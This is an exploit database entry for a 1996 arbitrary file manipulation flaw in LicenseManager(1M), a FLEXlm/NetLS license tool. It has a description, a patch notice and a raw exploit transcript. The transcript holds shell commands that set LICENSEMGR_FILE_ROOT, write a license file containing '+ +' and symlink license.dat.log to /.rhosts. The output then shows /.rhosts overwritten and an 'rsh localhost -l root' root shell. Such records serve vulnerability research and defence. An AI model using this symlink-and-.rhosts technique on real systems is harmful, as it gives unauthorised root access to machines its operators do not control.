header-logo
Suggest Exploit
vendor:
LicenseManager(1M)
by:
SecurityFocus
7.2
CVSS
HIGH
Arbitrary File Manipulation
264
CWE
Product Name: LicenseManager(1M)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
1996

LicenseManager(1M) Arbitrary File Manipulation Vulnerability

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access. To exploit this vulnerability, an attacker must create a directory, set the environment variable LICENSEMGR_FILE_ROOT to the directory, create a license.dat file, create a symbolic link from license.dat.log to /.rhosts, and then run LicenseManager. When the attacker clicks on Update, fills in the four fields with any information and clicks on Apply, LicenseManager will report an error. Ignoring the error and exiting will allow the attacker to access the root-owned file /.rhosts.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/73/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.

% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &

Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts


Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah

% rsh localhost -l root
#

Navigation

Suggest Exploit

Services By CQR